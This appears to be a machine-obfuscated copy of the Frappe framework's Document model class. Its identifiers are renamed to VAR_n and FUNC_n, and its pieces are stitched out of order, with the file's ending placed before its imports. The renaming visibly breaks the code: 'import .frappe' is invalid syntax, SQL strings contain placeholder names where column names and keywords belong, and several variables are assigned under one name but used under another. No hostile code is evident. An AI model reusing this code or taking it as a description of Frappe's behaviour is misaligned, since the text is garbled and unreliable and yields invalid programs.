"comment_email": VAR_38 or frappe.session.user,
"comment_by": VAR_41,
"reference_doctype": self.doctype,
"reference_name": self.name,
"content": VAR_37 or VAR_36,
"link_doctype": VAR_39,
"link_name": VAR_40
}).insert(VAR_11=True)
return VAR_66
def FUNC_67(self, VAR_42=None):
if not VAR_42:
user = frappe.session.user
if self.meta.track_seen:
VAR_95 = self.get('_seen') or []
VAR_95 = frappe.parse_json(VAR_95)
if VAR_42 not in VAR_95:
_seen.append(VAR_42)
frappe.db.set_value(self.doctype, self.name, '_seen', json.dumps(VAR_95), VAR_27=False)
frappe.local.flags.commit = True
def FUNC_68(self, VAR_42=None):
if not VAR_42:
user = frappe.session.user
if hasattr(self.meta, 'track_views') and self.meta.track_views:
frappe.get_doc({
"doctype": "View Log",
"viewed_by": frappe.session.user,
"reference_doctype": self.doctype,
"reference_name": self.name,
}).insert(VAR_11=True)
frappe.local.flags.commit = True
def FUNC_69(self):
return hashlib.sha224(get_datetime_str(self.creation).encode()).hexdigest()
def FUNC_70(self):
VAR_76 = getattr(self, "_liked_by", None)
if VAR_76:
return json.loads(VAR_76)
else:
return []
def FUNC_71(self, VAR_43, VAR_26):
if not self.get("__onload"):
self.set("__onload", frappe._dict())
self.get("__onload")[VAR_43] = VAR_26
def FUNC_72(self, VAR_43=None):
if not VAR_43:
return self.get("__onload", frappe._dict())
return self.get('__onload')[VAR_43]
def FUNC_73(self, VAR_4, **VAR_1):
from frappe.utils.background_jobs import enqueue
if hasattr(self, '_' + VAR_4):
action = '_' + VAR_4
if file_lock.lock_exists(self.get_signature()):
frappe.throw(_('This document is currently queued for execution. Please try again'),
title=_('Document Queued'))
self.lock()
enqueue('frappe.model.document.execute_action', VAR_2=self.doctype, VAR_3=self.name,
VAR_4=action, **VAR_1)
def FUNC_74(self, VAR_44=None):
VAR_77 = self.get_signature()
if file_lock.lock_exists(VAR_77):
VAR_96 = True
if VAR_44:
for i in range(VAR_44):
time.sleep(1)
if not file_lock.lock_exists(VAR_77):
VAR_96 = False
break
if VAR_96:
raise frappe.DocumentLockedError
file_lock.create_lock(VAR_77)
def FUNC_75(self):
file_lock.delete_lock(self.get_signature())
def FUNC_76(self, VAR_45, VAR_46):
if date_diff(self.get(VAR_46), self.get(VAR_45)) < 0:
frappe.throw(_('{0} must be after {1}').format(
frappe.bold(self.meta.get_label(VAR_46)),
frappe.bold(self.meta.get_label(VAR_45)),
), frappe.exceptions.InvalidDates)
def FUNC_77(self):
VAR_78 = frappe.get_all('ToDo',
fields=['owner'],
filters={
'reference_type': self.doctype,
'reference_name': self.name,
'status': ('!=', 'Cancelled'),
})
VAR_79 = set([assignment.owner for assignment in VAR_78])
return VAR_79
def FUNC_78(self, VAR_47):
from frappe.desk.doctype.tag.tag import DocTags
DocTags(self.doctype).add(self.name, VAR_47)
def FUNC_79(self):
from frappe.desk.doctype.tag.tag import DocTags
return DocTags(self.doctype).get_tags(self.name).split(",")[1:]
def FUNC_1(VAR_2, VAR_3, VAR_4, **VAR_1):
VAR_32 = frappe.get_doc(VAR_2, VAR_3)
VAR_32.unlock()
try:
getattr(VAR_32, VAR_4)(**VAR_1)
except Exception:
frappe.db.rollback()
if frappe.local.message_log:
VAR_87 = json.loads(frappe.local.message_log[-1]).get('message')
else:
VAR_87 = '<pre><code>' + frappe.get_traceback() + '</pre></code>'
VAR_32.add_comment('Comment', _('Action Failed') + '<br><br>' + VAR_87)
VAR_32.notify_update()
|
from __future__ import unicode_literals, print_function
import .frappe
import time
from frappe import _, msgprint, FUNC_61
from frappe.utils import .flt, cstr, now, get_datetime_str, file_lock, date_diff
from frappe.model.base_document import BaseDocument, get_controller
from frappe.model.naming import .set_new_name
from six import iteritems, string_types
from werkzeug.exceptions import NotFound, Forbidden
import hashlib, json
from frappe.model import optional_fields, VAR_82
from frappe.model.workflow import .validate_workflow
from frappe.model.workflow import set_workflow_state_on_action
from frappe.utils.global_search import update_global_search
from frappe.integrations.doctype.webhook import run_webhooks
from frappe.desk.form.document_follow import .follow_document
from frappe.core.doctype.server_script.server_script_utils import run_server_script_for_doc_event
def FUNC_0(*VAR_0, **VAR_1):
if VAR_0:
if isinstance(VAR_0[0], BaseDocument):
return VAR_0[0]
elif isinstance(VAR_0[0], string_types):
VAR_2 = VAR_0[0]
elif isinstance(VAR_0[0], dict):
VAR_1 = VAR_0[0]
else:
raise ValueError('First non keyword argument must be a string or dict')
if len(VAR_0) < 2 and VAR_1:
if 'doctype' in VAR_1:
VAR_2 = VAR_1['doctype']
else:
raise ValueError('"doctype" is a required key')
VAR_5 = get_controller(VAR_2)
if VAR_5:
return VAR_5(*VAR_0, **VAR_1)
raise ImportError(VAR_2)
class CLASS_0(BaseDocument):
def __init__(self, *VAR_0, **VAR_1):
self.doctype = self.name = None
self._default_new_docs = {}
self.flags = frappe._dict()
if VAR_0 and VAR_0[0] and isinstance(VAR_0[0], string_types):
if len(VAR_0)==1:
self.doctype = self.name = VAR_0[0]
else:
self.doctype = VAR_0[0]
if isinstance(VAR_0[1], dict):
self.name = frappe.db.get_value(VAR_0[0], VAR_0[1], "name")
if self.name is None:
frappe.throw(_("{0} {1} not found").format(_(VAR_0[0]), VAR_0[1]),
frappe.DoesNotExistError)
else:
self.name = VAR_0[1]
if 'for_update' in VAR_1:
self.flags.for_update = VAR_1.get('for_update')
self.load_from_db()
return
if VAR_0 and VAR_0[0] and isinstance(VAR_0[0], dict):
VAR_1 = VAR_0[0]
if VAR_1:
super(CLASS_0, self).__init__(VAR_1)
self.init_valid_columns()
else:
raise ValueError('Illegal arguments')
@staticmethod
def FUNC_2(VAR_6):
frappe.whitelist()(VAR_6)
return VAR_6
def FUNC_3(self):
self.load_from_db()
def FUNC_4(self):
if not getattr(self, "_metaclass", False) and self.meta.issingle:
VAR_81 = frappe.db.get_singles_dict(self.doctype)
if not VAR_81:
single_doc = frappe.new_doc(self.doctype).as_dict()
VAR_81["name"] = self.doctype
del VAR_81["__islocal"]
super(CLASS_0, self).__init__(VAR_81)
self.init_valid_columns()
self._fix_numeric_types()
else:
VAR_21 = frappe.db.get_value(self.doctype, self.name, "*", as_dict=1, for_update=self.flags.for_update)
if not VAR_21:
frappe.throw(_("{0} {1} not found").format(_(self.doctype), self.name), frappe.DoesNotExistError)
super(CLASS_0, self).__init__(VAR_21)
if self.name=="DocType" and self.doctype=="DocType":
from frappe.model.meta import DOCTYPE_TABLE_FIELDS
VAR_82 = DOCTYPE_TABLE_FIELDS
else:
VAR_82 = self.meta.get_table_fields()
for VAR_19 in VAR_82:
VAR_52 = frappe.db.get_values(VAR_19.options,
{"parent": self.name, "parenttype": self.doctype, "parentfield": VAR_19.fieldname},
"*", as_dict=True, order_by="idx asc")
if VAR_52:
self.set(VAR_19.fieldname, VAR_52)
else:
self.set(VAR_19.fieldname, [])
if hasattr(self, "__setup__"):
self.__setup__()
def FUNC_5(self):
if not getattr(self, "latest", None):
self.latest = frappe.get_doc(self.doctype, self.name)
return self.latest
def FUNC_6(self, VAR_7='read', VAR_8=None):
if not self.has_permission(VAR_7):
self.raise_no_permission_to(VAR_8 or VAR_7)
def FUNC_7(self, VAR_7="read", VAR_9=False):
if self.flags.ignore_permissions:
return True
return frappe.has_permission(self.doctype, VAR_7, self, VAR_9=verbose)
def FUNC_8(self, VAR_10):
frappe.flags.error_message = _('Insufficient Permission for {0}').format(self.doctype)
raise frappe.PermissionError
def FUNC_9(self, VAR_11=None, VAR_12=None, VAR_13=False,
VAR_14=None, VAR_15=None, VAR_16=True):
if self.flags.in_print:
return
self.flags.notifications_executed = []
if VAR_11!=None:
self.flags.ignore_permissions = VAR_11
if VAR_12!=None:
self.flags.ignore_links = VAR_12
if VAR_14!=None:
self.flags.ignore_mandatory = VAR_14
self.set("__islocal", True)
self.check_permission("create")
self._set_defaults()
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.run_method("before_insert")
self._validate_links()
self.set_new_name(VAR_15=set_name, VAR_16=set_child_names)
self.set_parent_in_children()
self.validate_higher_perm_levels()
self.flags.in_insert = True
self.run_before_save_methods()
self._validate()
self.set_docstatus()
self.flags.in_insert = False
if getattr(self.meta, "issingle", 0):
self.update_single(self.get_valid_dict())
else:
try:
self.db_insert()
except frappe.DuplicateEntryError as e:
if not VAR_13:
raise e
for VAR_21 in self.get_all_children():
VAR_21.db_insert()
self.run_method("after_insert")
self.flags.in_insert = True
if self.get("amended_from"):
self.copy_attachments_from_amended_from()
self.flags.update_log_for_doc_creation = True
self.run_post_save_methods()
self.flags.in_insert = False
if hasattr(self, "__islocal"):
delattr(self, "__islocal")
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
if not (frappe.flags.in_migrate or frappe.local.flags.in_install or frappe.flags.in_setup_wizard):
follow_document(self.doctype, self.name, frappe.session.user)
return self
def FUNC_10(self, *VAR_0, **VAR_1):
return self._save(*VAR_0, **VAR_1)
def FUNC_11(self, VAR_11=None, VAR_17=None):
if self.flags.in_print:
return
self.flags.notifications_executed = []
if VAR_11!=None:
self.flags.ignore_permissions = VAR_11
self.flags.ignore_version = frappe.flags.in_test if VAR_17 is None else VAR_17
if self.get("__islocal") or not self.get("name"):
self.insert()
return
self.check_permission("write", "save")
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.set_parent_in_children()
self.set_name_in_children()
self.validate_higher_perm_levels()
self._validate_links()
self.run_before_save_methods()
if self._action != "cancel":
self._validate()
if self._action == "update_after_submit":
self.validate_update_after_submit()
self.set_docstatus()
if self.meta.issingle:
self.update_single(self.get_valid_dict())
else:
self.db_update()
self.update_children()
self.run_post_save_methods()
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
return self
def FUNC_12(self):
from frappe.desk.form.load import get_attachments
for attach_item in get_attachments(self.doctype, self.amended_from):
VAR_83 = frappe.get_doc({
"doctype": "File",
"file_url": attach_item.file_url,
"file_name": attach_item.file_name,
"attached_to_name": self.name,
"attached_to_doctype": self.doctype,
"folder": "Home/Attachments"})
VAR_83.save()
def FUNC_13(self):
for VAR_19 in self.meta.get_table_fields():
self.update_child_table(VAR_19.fieldname, VAR_19)
def FUNC_14(self, VAR_18, VAR_19=None):
VAR_50 = []
if not VAR_19:
VAR_19 = self.meta.get_field(VAR_18)
for VAR_21 in self.get(VAR_19.fieldname):
VAR_21.db_update()
VAR_50.append(VAR_21.name)
if VAR_19.options in (self.flags.ignore_children_type or []):
return
if VAR_50:
VAR_84 = frappe.db.sql("""select VAR_3 from `tab{0}` where parent=%s
and VAR_24=%s and VAR_36=%s
and VAR_3 not in ({1})""".format(VAR_19.options, ','.join(['%s'] * len(VAR_50))),
[self.name, self.doctype, VAR_18] + VAR_50)
if len(VAR_84) > 0:
frappe.db.sql("""delete from `tab{0}` where VAR_3 in ({1})""".format(VAR_19.options,
','.join(['%s'] * len(VAR_84))), tuple(row[0] for row in VAR_84))
else:
frappe.db.sql("""delete from `tab{0}` where parent=%s
and VAR_24=%s and VAR_36=%s""".format(VAR_19.options),
(self.name, self.doctype, VAR_18))
def FUNC_15(self):
return getattr(self, '_doc_before_save', None)
def FUNC_16(self, VAR_18):
VAR_51 = self.get_doc_before_save()
return VAR_51.get(VAR_18)!=self.get(VAR_18) if VAR_51 else True
def FUNC_17(self, VAR_20=False, VAR_15=None, VAR_16=True):
if self.flags.name_set and not VAR_20:
return
if self.get("__newname"):
self.name = self.get("__newname")
self.flags.name_set = True
return
if VAR_15:
self.name = VAR_15
else:
FUNC_17(self)
if VAR_16:
for VAR_21 in self.get_all_children():
FUNC_17(VAR_21)
self.flags.name_set = True
def FUNC_18(self):
return self.get(self.meta.get_title_field())
def FUNC_19(self):
def FUNC_80():
VAR_85 = self.as_dict()
for VAR_45, VAR_26 in iteritems(VAR_85):
if VAR_26==None:
VAR_85[VAR_45] = ""
return VAR_85
if self.meta.get("title_field")=="title":
VAR_19 = self.meta.get_field(self.meta.title_field)
if VAR_19.options:
self.set(VAR_19.fieldname, VAR_19.options.format(**FUNC_80()))
elif self.is_new() and not self.get(VAR_19.fieldname) and VAR_19.default:
self.set(VAR_19.fieldname, VAR_19.default.format(**FUNC_80()))
def FUNC_20(self, VAR_21):
frappe.db.sql("""delete from `tabSingles` where VAR_2=%s""", self.doctype)
for field, VAR_26 in iteritems(VAR_21):
if field != "doctype":
frappe.db.sql("""insert into `tabSingles` (VAR_2, field, VAR_26)
VAR_85 (%s, %s, %s)""", (self.doctype, field, VAR_26))
if self.doctype in frappe.db.value_cache:
del frappe.db.value_cache[self.doctype]
def FUNC_21(self):
self._original_modified = self.modified
self.modified = now()
self.modified_by = frappe.session.user
if not self.creation:
self.creation = self.modified
if not self.owner:
self.owner = self.modified_by
for VAR_21 in self.get_all_children():
VAR_21.modified = self.modified
VAR_21.modified_by = self.modified_by
if not VAR_21.owner:
VAR_21.owner = self.owner
if not VAR_21.creation:
VAR_21.creation = self.creation
frappe.flags.currently_saving.append((self.doctype, self.name))
def FUNC_22(self):
if self.docstatus==None:
self.docstatus=0
for VAR_21 in self.get_all_children():
VAR_21.docstatus = self.docstatus
def FUNC_23(self):
self._validate_mandatory()
self._validate_data_fields()
self._validate_selects()
self._validate_non_negative()
self._validate_length()
self._extract_images_from_text_editor()
self._sanitize_content()
self._save_passwords()
self.validate_workflow()
VAR_52 = self.get_all_children()
for VAR_21 in VAR_52:
VAR_21._validate_data_fields()
VAR_21._validate_selects()
VAR_21._validate_non_negative()
VAR_21._validate_length()
VAR_21._extract_images_from_text_editor()
VAR_21._sanitize_content()
VAR_21._save_passwords()
if self.is_new():
for VAR_18 in optional_fields:
self.set(VAR_18, None)
else:
self.validate_set_only_once()
def FUNC_24(self):
def FUNC_81(VAR_19):
if self.parentfield:
return "{} {} #{}: {} {}".format(frappe.bold(_(self.doctype)),
_("Row"), self.idx, _("Value cannot be negative for"), frappe.bold(_(VAR_19.label)))
else:
return _("Value cannot be negative for {0}: {1}").format(_(VAR_19.parent), frappe.bold(_(VAR_19.label)))
for VAR_19 in self.meta.get('fields', {'non_negative': ('=', 1),
'fieldtype': ('in', ['Int', 'Float', 'Currency'])}):
if flt(self.get(VAR_19.fieldname)) < 0:
VAR_88 = FUNC_81(VAR_19)
frappe.throw(VAR_88, frappe.NonNegativeError, title=_("Negative Value"))
def FUNC_25(self):
if frappe.flags.in_install == 'frappe': return
VAR_53 = self.meta.get_workflow()
if VAR_53:
FUNC_25(self)
if not self._action == 'save':
set_workflow_state_on_action(self, VAR_53, self._action)
def FUNC_26(self):
VAR_54 = self.meta.get_set_only_once_fields()
if VAR_54 and self._doc_before_save:
for field in VAR_54:
VAR_98 = False
VAR_26 = self.get(field.fieldname)
VAR_55 = self._doc_before_save.get(field.fieldname)
if field.fieldtype in VAR_82:
VAR_98 = not self.is_child_table_same(field.fieldname)
elif field.fieldtype in ('Date', 'Datetime', 'Time'):
VAR_98 = str(VAR_26) != str(VAR_55)
else:
VAR_98 = VAR_26 != VAR_55
if VAR_98:
frappe.throw(_("Value cannot be changed for {0}").format(self.meta.get_label(field.fieldname)),
frappe.CannotChangeConstantError)
return False
def FUNC_27(self, VAR_18):
VAR_26 = self.get(VAR_18)
VAR_55 = self._doc_before_save.get(VAR_18)
VAR_56 = True
if len(VAR_55) != len(VAR_26):
VAR_56 = False
else:
for i, VAR_21 in enumerate(VAR_55):
VAR_99 = VAR_26[i].as_dict(convert_dates_to_str = True)
VAR_100 = VAR_21.as_dict(convert_dates_to_str = True)
for VAR_45 in ('modified', 'modified_by', 'creation'):
del VAR_99[VAR_45]
del VAR_100[VAR_45]
if VAR_100 != VAR_99:
VAR_56 = False
break
return VAR_56
def FUNC_28(self):
if frappe.session.user == "Administrator":
return
VAR_57 = False
VAR_58 = self.meta.fields.copy()
for table_field in self.meta.get_table_fields():
VAR_58 += frappe.get_meta(table_field.options).fields or []
for VAR_19 in VAR_58:
if VAR_19.permlevel > 0:
VAR_57 = True
break
if not VAR_57:
return
VAR_59 = self.get_permlevel_access('read')
for VAR_19 in self.meta.fields:
if VAR_19.permlevel and not VAR_19.permlevel in VAR_59:
self.set(VAR_19.fieldname, None)
for table_field in self.meta.get_table_fields():
for VAR_19 in frappe.get_meta(table_field.options).fields or []:
if VAR_19.permlevel and not VAR_19.permlevel in VAR_59:
for child in self.get(table_field.fieldname) or []:
child.set(VAR_19.fieldname, None)
def FUNC_29(self):
if self.flags.ignore_permissions or frappe.flags.in_install:
return
if frappe.session.user == "Administrator":
return
VAR_59 = self.get_permlevel_access()
VAR_60 = self.meta.get_high_permlevel_fields()
if VAR_60:
self.reset_values_if_no_permlevel_access(VAR_59, VAR_60)
if self.is_new(): return
for VAR_19 in self.meta.get_table_fields():
VAR_60 = frappe.get_meta(VAR_19.options).get_high_permlevel_fields()
if VAR_60:
for VAR_21 in self.get(VAR_19.fieldname):
VAR_21.reset_values_if_no_permlevel_access(VAR_59, VAR_60)
def FUNC_30(self, VAR_22='write'):
if not hasattr(self, "_has_access_to"):
self._has_access_to = {}
self._has_access_to[VAR_22] = []
VAR_61 = frappe.get_roles()
for perm in self.get_permissions():
if perm.role in VAR_61 and perm.get(VAR_22):
if perm.permlevel not in self._has_access_to[VAR_22]:
self._has_access_to[VAR_22].append(perm.permlevel)
return self._has_access_to[VAR_22]
def FUNC_31(self, VAR_18, VAR_19=None, VAR_22='read'):
if not VAR_19:
VAR_19 = self.meta.get_field(VAR_18)
return VAR_19.permlevel in self.get_permlevel_access(VAR_22)
def FUNC_32(self):
if self.meta.istable:
permissions = frappe.get_meta(self.parenttype).permissions
else:
VAR_86 = self.meta.permissions
return VAR_86
def FUNC_33(self):
if frappe.flags.in_import:
return
VAR_62 = frappe.new_doc(self.doctype, as_dict=True)
self.update_if_missing(VAR_62)
for VAR_19 in self.meta.get_table_fields():
VAR_62 = frappe.new_doc(VAR_19.options, as_dict=True)
VAR_26 = self.get(VAR_19.fieldname)
if isinstance(VAR_26, list):
for VAR_21 in VAR_26:
VAR_21.update_if_missing(VAR_62)
def FUNC_34(self):
VAR_63 = False
self._action = "save"
if not self.get('__islocal'):
if self.meta.issingle:
VAR_101 = frappe.db.sql("""select VAR_26 from tabSingles
where VAR_2=%s and field='modified' for update""", self.doctype)
VAR_101 = VAR_101 and VAR_101[0][0]
if VAR_101 and VAR_101 != cstr(self._original_modified):
VAR_63 = True
else:
VAR_102 = frappe.db.sql("""select VAR_101, VAR_23 from `tab{0}`
where VAR_3 = %s for update""".format(self.doctype), self.name, as_dict=True)
if not VAR_102:
frappe.throw(_("Record does not exist"))
else:
VAR_102 = tmp[0]
VAR_101 = cstr(VAR_102.modified)
if VAR_101 and VAR_101 != cstr(self._original_modified):
VAR_63 = True
self.check_docstatus_transition(VAR_102.docstatus)
if VAR_63:
frappe.msgprint(_("Error: CLASS_0 has been VAR_101 after you have opened it") \
+ (" (%s, %s). " % (VAR_101, self.modified)) \
+ _("Please refresh to get the latest document."),
VAR_35=frappe.TimestampMismatchError)
else:
self.check_docstatus_transition(0)
def FUNC_35(self, VAR_23):
if not self.docstatus:
self.docstatus = 0
if VAR_23==0:
if self.docstatus==0:
self._action = "save"
elif self.docstatus==1:
self._action = "submit"
self.check_permission("submit")
else:
raise frappe.DocstatusTransitionError(_("Cannot change VAR_23 from 0 to 2"))
elif VAR_23==1:
if self.docstatus==1:
self._action = "update_after_submit"
self.check_permission("submit")
elif self.docstatus==2:
self._action = "cancel"
self.check_permission("cancel")
else:
raise frappe.DocstatusTransitionError(_("Cannot change VAR_23 from 1 to 0"))
elif VAR_23==2:
raise frappe.ValidationError(_("Cannot edit cancelled document"))
def FUNC_36(self):
for VAR_21 in self.get_all_children():
VAR_21.parent = self.name
VAR_21.parenttype = self.doctype
def FUNC_37(self):
for VAR_21 in self.get_all_children():
if not VAR_21.name:
FUNC_17(VAR_21)
def FUNC_38(self):
if self.flags.ignore_validate_update_after_submit:
return
self._validate_update_after_submit()
for VAR_21 in self.get_all_children():
if VAR_21.is_new() and self.meta.get_field(VAR_21.parentfield).allow_on_submit:
continue
VAR_21._validate_update_after_submit()
def FUNC_39(self):
if self.flags.ignore_mandatory:
return
VAR_64 = self._get_missing_mandatory_fields()
for VAR_21 in self.get_all_children():
VAR_64.extend(VAR_21._get_missing_mandatory_fields())
if not VAR_64:
return
for VAR_18, VAR_88 in VAR_64:
msgprint(VAR_88)
if frappe.flags.print_messages:
print(self.as_json().encode("utf-8"))
raise frappe.MandatoryError('[{VAR_2}, {VAR_3}]: {fields}'.format(
fields=", ".join((each[0] for each in VAR_64)),
VAR_2=self.doctype,
VAR_3=self.name))
def FUNC_40(self):
if self.flags.ignore_links or self._action == "cancel":
return
VAR_65, VAR_66 = self.get_invalid_links()
for VAR_21 in self.get_all_children():
VAR_87 = VAR_21.get_invalid_links(is_submittable=self.meta.is_submittable)
VAR_65.extend(VAR_87[0])
VAR_66.extend(VAR_87[1])
if VAR_65:
VAR_88 = ", ".join((each[2] for each in VAR_65))
frappe.throw(_("Could not find {0}").format(VAR_88),
frappe.LinkValidationError)
if VAR_66:
VAR_88 = ", ".join((each[2] for each in VAR_66))
frappe.throw(_("Cannot link cancelled document: {0}").format(VAR_88),
frappe.CancelledLinkError)
def FUNC_41(self, VAR_24=None):
VAR_67 = []
for VAR_19 in self.meta.get("fields", {"fieldtype": ['in', VAR_82]}):
if VAR_24:
if VAR_19.options==VAR_24:
return self.get(VAR_19.fieldname)
VAR_26 = self.get(VAR_19.fieldname)
if isinstance(VAR_26, list):
VAR_67.extend(VAR_26)
return VAR_67
def FUNC_42(self, VAR_25, *VAR_0, **VAR_1):
if "flags" in VAR_1:
del VAR_1["flags"]
if hasattr(self, VAR_25) and hasattr(getattr(self, VAR_25), "__call__"):
VAR_6 = lambda self, *VAR_0, **VAR_1: getattr(self, VAR_25)(*VAR_0, **VAR_1)
else:
VAR_6 = lambda self, *VAR_0, **VAR_1: None
VAR_6.__name__ = str(VAR_25)
VAR_68 = CLASS_0.hook(VAR_6)(self, *VAR_0, **VAR_1)
self.run_notifications(VAR_25)
run_webhooks(self, VAR_25)
run_server_script_for_doc_event(self, VAR_25)
return VAR_68
def FUNC_43(self, VAR_25, *VAR_0, **VAR_1):
return self.run_method(VAR_25, *VAR_0, **VAR_1)
def FUNC_44(self, VAR_25):
if (frappe.flags.in_import and frappe.flags.mute_emails) or frappe.flags.in_patch or frappe.flags.in_install:
return
if self.flags.notifications_executed==None:
self.flags.notifications_executed = []
from frappe.email.doctype.notification.notification import evaluate_alert
if self.flags.notifications == None:
VAR_89 = frappe.cache().hget('notifications', self.doctype)
if VAR_89==None:
VAR_89 = frappe.get_all('Notification', fields=['name', 'event', 'method'],
filters={'enabled': 1, 'document_type': self.doctype})
frappe.cache().hset('notifications', self.doctype, VAR_89)
self.flags.notifications = VAR_89
if not self.flags.notifications:
return
def FUNC_82(VAR_69):
if not VAR_69.name in self.flags.notifications_executed:
evaluate_alert(self, VAR_69.name, VAR_69.event)
self.flags.notifications_executed.append(VAR_69.name)
VAR_70 = {
"on_update": "Save",
"after_insert": "New",
"on_submit": "Submit",
"on_cancel": "Cancel"
}
if not self.flags.in_insert:
VAR_70['on_change'] = 'Value Change'
for VAR_69 in self.flags.notifications:
VAR_90 = VAR_70.get(VAR_25, None)
if VAR_90 and VAR_69.event == VAR_90:
FUNC_82(VAR_69)
elif VAR_69.event=='Method' and VAR_25 == VAR_69.method:
FUNC_82(VAR_69)
@FUNC_2.__func__
def FUNC_45(self):
self.docstatus = 1
self.save()
@FUNC_2.__func__
def FUNC_46(self):
self.docstatus = 2
self.save()
@FUNC_2.__func__
def FUNC_47(self):
self._submit()
@FUNC_2.__func__
def FUNC_48(self):
self._cancel()
def FUNC_49(self, VAR_11=False):
frappe.delete_doc(self.doctype, self.name, VAR_11 = ignore_permissions, flags=self.flags)
def FUNC_50(self):
self.load_doc_before_save()
self.reset_seen()
if self._action in ("save", "submit"):
self.run_method("before_validate")
if self.flags.ignore_validate:
return
if self._action=="save":
self.run_method("validate")
self.run_method("before_save")
elif self._action=="submit":
self.run_method("validate")
self.run_method("before_submit")
elif self._action=="cancel":
self.run_method("before_cancel")
elif self._action=="update_after_submit":
self.run_method("before_update_after_submit")
self.set_title_field()
def FUNC_51(self):
self._doc_before_save = None
if not self.is_new():
try:
self._doc_before_save = frappe.get_doc(self.doctype, self.name)
except frappe.DoesNotExistError:
self._doc_before_save = None
frappe.clear_last_message()
def FUNC_52(self):
VAR_71 = self.get_doc_before_save()
if self._action=="save":
self.run_method("on_update")
elif self._action=="submit":
self.run_method("on_update")
self.run_method("on_submit")
elif self._action=="cancel":
self.run_method("on_cancel")
self.check_no_back_links_exist()
elif self._action=="update_after_submit":
self.run_method("on_update_after_submit")
self.clear_cache()
self.notify_update()
update_global_search(self)
self.save_version()
self.run_method('on_change')
if (self.doctype, self.name) in frappe.flags.currently_saving:
frappe.flags.currently_saving.remove((self.doctype, self.name))
self.latest = None
def FUNC_53(self):
frappe.clear_document_cache(self.doctype, self.name)
def FUNC_54(self):
if getattr(self.meta, 'track_seen', False):
frappe.db.set_value(self.doctype, self.name, "_seen", json.dumps([frappe.session.user]), VAR_27=False)
def FUNC_55(self):
if frappe.flags.in_patch: return
frappe.publish_realtime("doc_update", {"modified": self.modified, "doctype": self.doctype, "name": self.name},
VAR_2=self.doctype, docname=self.name, after_commit=True)
if not self.meta.get("read_only") and not self.meta.get("issingle") and \
not self.meta.get("istable"):
VAR_91 = {
"doctype": self.doctype,
"name": self.name,
"user": frappe.session.user
}
frappe.publish_realtime("list_update", VAR_91, after_commit=True)
def FUNC_56(self, VAR_18, VAR_26=None, VAR_27=True, VAR_28=False, VAR_29=False):
if isinstance(VAR_18, dict):
self.update(VAR_18)
else:
self.set(VAR_18, VAR_26)
if VAR_27 and (self.doctype, self.name) not in frappe.flags.currently_saving:
self.set("modified", now())
self.set("modified_by", frappe.session.user)
self.load_doc_before_save()
self.run_method('before_change')
frappe.db.set_value(self.doctype, self.name, VAR_18, VAR_26,
self.modified, self.modified_by, VAR_27=update_modified)
self.run_method('on_change')
if VAR_28:
self.notify_update()
self.clear_cache()
if VAR_29:
frappe.db.commit()
def FUNC_57(self, VAR_18):
return frappe.db.get_value(self.doctype, self.name, VAR_18)
def FUNC_58(self):
from frappe.model.delete_doc import check_if_doc_is_linked, check_if_doc_is_dynamically_linked
if not self.flags.ignore_links:
check_if_doc_is_linked(self, VAR_25="Cancel")
check_if_doc_is_dynamically_linked(self, VAR_25="Cancel")
def FUNC_59(self):
if (not getattr(self.meta, 'track_changes', False)
or self.doctype == 'Version'
or self.flags.ignore_version
or frappe.flags.in_install
or (not self._doc_before_save and frappe.flags.in_patch)):
return
VAR_72 = frappe.new_doc('Version')
if not self._doc_before_save:
VAR_72.for_insert(self)
VAR_72.insert(VAR_11=True)
elif VAR_72.set_diff(self._doc_before_save, self):
VAR_72.insert(VAR_11=True)
if not frappe.flags.in_migrate:
follow_document(self.doctype, self.name, frappe.session.user)
@staticmethod
def FUNC_60(VAR_30):
def FUNC_83(self, VAR_73):
if isinstance(VAR_73, dict):
if not self.get("_return_value"):
self._return_value = {}
self._return_value.update(VAR_73)
else:
self._return_value = VAR_73 or self.get("_return_value")
def FUNC_84(VAR_6, *VAR_74):
def FUNC_86(self, VAR_25, *VAR_0, **VAR_1):
FUNC_83(self, VAR_6(self, *VAR_0, **VAR_1))
for VAR_30 in VAR_74:
FUNC_83(self, VAR_30(self, VAR_25, *VAR_0, **VAR_1))
return self._return_value
return FUNC_86
def FUNC_85(self, *VAR_0, **VAR_1):
VAR_74 = []
VAR_25 = VAR_30.__name__
VAR_92 = frappe.get_doc_hooks()
for handler in VAR_92.get(self.doctype, {}).get(VAR_25, []) \
+ VAR_92.get("*", {}).get(VAR_25, []):
VAR_74.append(frappe.get_attr(handler))
VAR_93 = FUNC_84(VAR_30, *VAR_74)
return VAR_93(self, VAR_25, *VAR_0, **VAR_1)
return FUNC_85
def FUNC_61(self, VAR_31):
VAR_25 = getattr(self, VAR_31, None)
if not VAR_6:
raise NotFound("Method {0} not found".format(VAR_31))
FUNC_61(getattr(VAR_25, '__func__', VAR_25))
def FUNC_62(self, VAR_18, VAR_32, VAR_33, VAR_34=None, VAR_35=None):
VAR_75 = {
"in": _("one of"),
"not in": _("none of"),
"^": _("beginning with"),
}
if not VAR_34:
doc = self
VAR_76 = VAR_34.get_value(VAR_18)
VAR_19 = VAR_34.meta.get_field(VAR_18)
VAR_33 = VAR_34.cast(VAR_33, VAR_19)
if not frappe.compare(VAR_76, VAR_32, VAR_33):
VAR_94 = VAR_34.meta.get_label(VAR_18)
VAR_95 = VAR_75.get(VAR_32, condition)
if VAR_34.parentfield:
VAR_88 = _("Incorrect VAR_26 in row {0}: {1} must be {2} {3}").format(VAR_34.idx, VAR_94, VAR_95, VAR_33)
else:
VAR_88 = _("Incorrect VAR_26: {0} must be {1} {2}").format(VAR_94, VAR_95, VAR_33)
msgprint(VAR_88, VAR_35=raise_exception or True)
def FUNC_63(self, VAR_36, VAR_35=None):
if not (isinstance(self.get(VAR_36), list) and len(self.get(VAR_36)) > 0):
VAR_94 = self.meta.get_label(VAR_36)
frappe.throw(_("Table {0} cannot be empty").format(VAR_94), VAR_35 or frappe.EmptyTableError)
def FUNC_64(self, VAR_34, VAR_37=None):
if not VAR_37:
fieldnames = (VAR_19.fieldname for VAR_19 in
VAR_34.meta.get("fields", {"fieldtype": ["in", ["Currency", "Float", "Percent"]]}))
for VAR_18 in VAR_37:
VAR_34.set(VAR_18, flt(VAR_34.get(VAR_18), self.precision(VAR_18, VAR_34.parentfield)))
def FUNC_65(self):
return "/app/Form/{VAR_2}/{VAR_3}".format(VAR_2=self.doctype, VAR_3=self.name)
